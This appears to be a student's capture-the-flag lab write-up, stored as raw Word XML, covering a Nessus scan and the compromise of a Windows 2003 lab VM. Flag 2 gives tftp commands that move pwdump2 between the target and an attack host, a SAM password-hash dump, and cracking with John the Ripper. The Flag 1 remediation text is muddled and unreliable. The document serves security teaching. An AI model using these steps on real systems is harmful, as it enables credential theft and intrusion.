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E34" w:rsidRPr="00107358" w:rsidRDefault="005C6E34" w:rsidP="005C6E34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107358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Capture the flag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#4: Vulnerability Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6E34" w:rsidRDefault="005C6E34" w:rsidP="005C6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00107358">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2646D" w:rsidRPr="005C6E34" w:rsidRDefault="005C6E34" w:rsidP="005C6E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C6E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Using a Nessus server analyze your Windows 2003 target. Export your report as an html file and include it in your assignment documents you turn in.</w:t>
      </w:r>
      <w:r w:rsidR="00E94D94">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Explain the risks (only the high and medium risks) associated with your server and how you can reduce or eliminate your exposure to the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6E34" w:rsidRPr="00A87C70" w:rsidRDefault="007B07C1" w:rsidP="005C6E34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A87C70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This shows that my windows 2003 target, 192.168.1.204, I did an external scan and I got 17 total concerns 10 low and 7 open ports. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C5447" w:rsidRPr="00A87C70" w:rsidRDefault="006C5447" w:rsidP="006C5447">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Now I didn’t get any High or Medium risks but I did get 10 low, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>It</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> looks like I have 5 low DCE Services Enumeration. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rStyle w:val="less1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>A DCE/RPC service is running on the remote host.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rStyle w:val="less1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> How we can fix these is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">allow UDP packets from DNSSERVER port 53 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>to WORKSTATION port above 1024 t</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>he outlined attack vector will pass through the above rule and succeed. Even personal firewall rules that specify an application wi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ll allow these attacks to pass </w:t>
      </w:r>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>allow UDP packets from DNSSERVER port 53 to WORKSTATION application services.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C5447" w:rsidRPr="006C5447" w:rsidRDefault="006C5447" w:rsidP="005C6E34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:rsidR="007B07C1" w:rsidRDefault="007B07C1" w:rsidP="005C6E3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B2E6572" wp14:editId="07FBDFF9">
            <wp:extent cx="5943600" cy="1243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7C1" w:rsidRDefault="007B07C1" w:rsidP="005C6E3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4AA8280" wp14:editId="35392224">
            <wp:extent cx="5943600" cy="1697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7C1" w:rsidRDefault="007B07C1" w:rsidP="005C6E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HTML Report</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B07C1" w:rsidRDefault="007B07C1" w:rsidP="005C6E3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F5F79D0" wp14:editId="429A3193">
            <wp:extent cx="5943600" cy="69697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7C1" w:rsidRPr="005C6E34" w:rsidRDefault="007B07C1" w:rsidP="005C6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C6E34" w:rsidRDefault="005C6E34" w:rsidP="005C6E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C6E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Flag 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00373023" w:rsidRPr="00373023" w:rsidRDefault="00373023" w:rsidP="005C6E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screen shots of your progress and success.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E6738" w:rsidRDefault="007E6738" w:rsidP="005C6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user called “stealthy” on your Windows 2003 Target VM. Set a password of five</w:t>
      </w:r>
      <w:r w:rsidR="00703C16">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or six</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> characters, based on a dictionary word.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6E34" w:rsidRDefault="007E6738" w:rsidP="005C6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with a partner and w</w:t>
      </w:r>
      <w:r w:rsidR="005C6E34" w:rsidRPr="005C6E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ithout directly accessing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5C6E34" w:rsidRPr="005C6E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows 2003 Target VM, get command line access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of your partner’s target VM</w:t>
      </w:r>
      <w:r w:rsidR="005C6E34" w:rsidRPr="005C6E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001139D6" w:rsidRPr="005C6E34" w:rsidRDefault="001139D6" w:rsidP="001139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only information you can obtain from your partner is the IP address of their Target VM.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6E34" w:rsidRPr="005C6E34" w:rsidRDefault="005C6E34" w:rsidP="005C6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6E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Once you have access, obtain the password file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C6E34" w:rsidRDefault="000901C7" w:rsidP="005C6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c</w:t>
      </w:r>
      <w:r w:rsidR="005C6E34" w:rsidRPr="005C6E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rack the password for the “stealthy” user and record the password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not crack the password for any other users in the file. Provide a screen shot of your cracking statement and the user. Points will be deducted if all users show. (hint: use the </w:t>
      </w:r>
      <w:r w:rsidR="0029285F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>users=</w:t>
      </w:r>
      <w:r w:rsidR="0029285F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option)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A87C70" w:rsidRPr="00A87C70" w:rsidRDefault="00A87C70" w:rsidP="00A87C7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metasploit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gain access to my target server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C5447" w:rsidRPr="006C5447" w:rsidRDefault="00A87C70" w:rsidP="006C544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15AD59" wp14:editId="0DA808F3">
            <wp:extent cx="5943600" cy="41275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5447">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A471A84" wp14:editId="14D131B1">
            <wp:extent cx="5943600" cy="42805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447" w:rsidRDefault="00A87C70" w:rsidP="006C544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Enabling TFTPD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C5447" w:rsidRDefault="006C5447" w:rsidP="006C544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886097" wp14:editId="07EE4724">
            <wp:extent cx="2381250" cy="1352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C70" w:rsidRDefault="00A87C70" w:rsidP="006C544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Transferring by doing this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A87C70" w:rsidRPr="00A87C70" w:rsidRDefault="00A87C70" w:rsidP="00A87C70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87C70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A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> target - c:\...&gt;tftp -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A87C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7C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> "IP of Attack" (get or put) "file name"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A87C70" w:rsidRPr="00A87C70" w:rsidRDefault="00A87C70" w:rsidP="00A87C70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87C70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A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack look in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A87C70" w:rsidRPr="00A87C70" w:rsidRDefault="00A87C70" w:rsidP="00A87C70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87C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>put</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends from target to the attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A87C70" w:rsidRPr="00A87C70" w:rsidRDefault="00A87C70" w:rsidP="00A87C70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87C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>get</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> sends from attack to the target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A87C70" w:rsidRPr="006C5447" w:rsidRDefault="00A87C70" w:rsidP="00A87C70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87C70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A87C70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the get pwdump2.exe, samdump.dll--pwddump2 &gt; "".txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C5447" w:rsidRDefault="006C5447" w:rsidP="006C544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727056" wp14:editId="1412FB93">
            <wp:extent cx="5943600" cy="42614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C70" w:rsidRDefault="00A87C70" w:rsidP="006C544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pwdump2 to access the SAM file and hashed password inside.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C5447" w:rsidRDefault="006C5447" w:rsidP="006C544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EA1773" wp14:editId="2E56FD46">
            <wp:extent cx="5943600" cy="18046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C70" w:rsidRDefault="00A87C70" w:rsidP="006C544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John the ripper to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>brutforce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those hashes and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>get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password for stealthy which is NINJA. </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="006C5447" w:rsidRPr="006C5447" w:rsidRDefault="006C5447" w:rsidP="006C544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CD6EAE" wp14:editId="242FAC65">
            <wp:extent cx="5943600" cy="1833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447" w:rsidRPr="006C5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650E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46BAB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B77D15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5323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E34"/>
    <w:rsid w:val="000901C7"/>
    <w:rsid w:val="001139D6"/>
    <w:rsid w:val="0029285F"/>
    <w:rsid w:val="002B1C49"/>
    <w:rsid w:val="00373023"/>
    <w:rsid w:val="005C6E34"/>
    <w:rsid w:val="006C5447"/>
    <w:rsid w:val="00703C16"/>
    <w:rsid w:val="007B07C1"/>
    <w:rsid w:val="007E6738"/>
    <w:rsid w:val="00A02483"/>
    <w:rsid w:val="00A87C70"/>
    <w:rsid w:val="00E9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E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E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7C1"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="less1">
    <w:name w:val="less1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C5447"/>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C5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E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E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7C1"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="less1">
    <w:name w:val="less1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006C5447"/>
    <w:rPr>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006C5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0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3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Utah University</Company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SUU</dc:creator>
  <cp:lastModifiedBy>SUU</cp:lastModifiedBy>
  <cp:revision>10</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-08-05T16:21:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-11-27T18:47:00Z</dcterms:modified>
</cp:coreProperties>
</file>